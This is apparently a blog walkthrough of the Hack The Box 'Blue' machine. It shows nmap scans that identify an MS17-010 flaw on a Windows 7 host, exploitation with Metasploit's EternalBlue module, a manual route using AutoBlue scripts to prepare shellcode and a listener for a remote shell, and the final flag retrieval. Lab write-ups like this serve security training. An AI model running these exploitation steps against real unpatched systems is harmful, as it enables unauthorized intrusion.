Blue Walkthrough Hack The Box

Rakshan Sharma
·
Follow
6 min read
·
Aug 31, 2020

1
So, this is an easy machine and the name of the machine really is a
giveaway but still it is a great machine simply because how common
ms17–010 is and how far reaching it really is. A lot of exploits that
don’t seem to be connected rely on it. Anyways, let’s get to the
machine walkthrough.

Let’s have some fun.

Firstly, I started with a simple nmap scan using the command:
nmap -p- -T4 10.10.10.40 | grep “open”

From this I got the following ports:

139, 135, 445, 49152, 49153, 49154, 49154, 49155, 49156, 49157

After this, I ran a complete scan using -A on the open ports

nmap -A -p139,135,445,49152–49157 -T4 10.10.10.40

Nmap scan report for 10.10.10.40

Host is up (0.21s latency).

PORT STATE SERVICE VERSION

135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601
Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could
not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 SP1
(96%), Microsoft Windows Server 2008 SP2 or Windows 10 or
Xbox One (96%), Microsoft Windows 7 (96%), Microsoft
Windows 7 Professional SP1 (96%), Microsoft Windows 7 SP0
— SP1, Windows Server 2008 SP1, Windows Server 2008 R2,
Windows 8, or Windows 8.1 Update 1 (96%), Microsoft
Windows 7 SP1 (96%), Microsoft Windows Vista or Windows 7
SP1 (96%), Microsoft Windows Vista SP0 — SP2, Windows
Server 2008, or Windows 7 Ultimate (96%), Microsoft
Windows Vista SP2, Windows 7, or Windows 7 SP1 (96%),
Microsoft Windows Server 2008 SP2 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE:
cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: -15m45s, deviation: 34m36s, median:
4m13s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1
(Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020–08–31T11:00:35+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020–08–31T10:00:37
|_ start_date: 2020–08–31T09:56:52

TRACEROUTE (using port 139/tcp)

HOP RTT ADDRESS
1 251.99 ms 10.10.14.1
2 252.06 ms 10.10.10.40

I always first exhaust the common ports before moving to less

common ports such as 46152 and all so I’m gonna start with the top
3 ports in bold. This scan also gives us the OS of the system which is
also highlighted in bold.
For good habit, you should also run an nmap on UDP ports using -
sU flag but since this is a walkthrough, I’m gonna forgo going down
that route since it yields no useful information.

After this, I also ran a script vulnerability scan on the top 3 ports.

nmap -p139,135,445 --script vuln 10.10.10.40

Host script results:

|_smb-vuln-ms10–054: false
|_smb-vuln-ms10–061:
NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1
servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in
Microsoft SMBv1
| servers (ms17–010).
|
| Disclosure date: 2017–03–14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-
010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-
2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/cust
omer-guidance-for-wannacrypt-attacks/

So, the host is vulnerable to ms17–010.

RPC(Dead-end) PORT 135

Let’s just go port by port. First up is 135 which is msrpc. Just by
running the following command, I ruled out port rpc as it refused a
connection altogether.

rpcinfo -p 10.10.10.40

10.10.10.40: RPC: Remote system error — Connection refused

By no means is this the only command worth running for rpc but
since we already have a vulnerability to exploit, we can forgo going
through some advanced script testing on rpc.

So that’s it for rpc

SMB(ms17–010) PORT 139,445

Ok, so from the nmap script vulnerability scanner we know that the
host is vulnerable to ms17–010. Let’s find out what that is.
https://docs.microsoft.com/en-us/security-updates/securitybulletins/
2017/ms17-010

Looks like it allows for remote code execution.

After a little bit of googling I found out that it’s a remote buffer
overflow that can potentially open a shell. After a bit more googling,
I found a rapid7 search result which means there is probably an
exploit in METASPLOIT for this.

https://www.rapid7.com/db/modules/exploit/windows/smb/
ms17_010_eternalblue

Now, I fired up msfconsole and searched for ms17–010

search ms17–010

Search result for ms17–010

Looks like there is a scanner that can confirm the vulnerability. Let’s
quickly run that and confirm our suspicions.

use auxiliary/scanner/smb/smb_ms17_010

I quickly ran the scanner and it looks like the host is vulnerable to ms17–
010

Exploiting ms17–010 using Metasploit

use exploit/windows/smb/ms17_010_eternalblue
Just setting the parameters

msf5 exploit(windows/smb/ms17_010_eternalblue)
> exploit

Success!!!

And we’re in.

So we successfully got in and all but this was no fun, all we did was
find an exploit and type run. Let’s do it a bit more manually.

Exploiting ms17–010 using AutoBlue

Get the exploit from github using the following command. If you do
not have git installed, simply run apt install git to get git.

git clone https://github.com/3ndG4me/AutoBlue-MS17-

010.git

By default, none of them will have execution privilege so we need to

change their permissions. Now, we don’t need all the scripts for this
attack so let’s start by checking what’s what

Auto Blue Files

Run these commands to change the permissions on the files we need to

execute.

Now, on my machine, listener_prep.sh already came with execution

privileges but if it doesn’t for you, then simply run:

chmod 777 listener_prep.sh

python eternal_checker.py 10.10.10.40

Not patched means vulnerable

Now, we need to create a shell. We can do that ourselves using

msfvenom or we can use the included shellprep script.

cd shellcode

./shell_prep.sh

The stuff in red is written by me

We’re after inet

cd ..

./listener_prep.sh

Preparing our listener

Started

Simply run

python eternalblue_exploit7.py 10.10.10.40

shellcode/sc_all.bin

Success

So, wait for some time after this and you should get a meterpreter
shell open.

We’re in
Finding the flags

Flags

cd ../../Users/Administrator/Desktop

type root.txt

cd ../../haris/Desktop

type user.txt

https://medium.com/@rakshan793/blue-walkthrough-hack-the-box-7d5a87db5dbe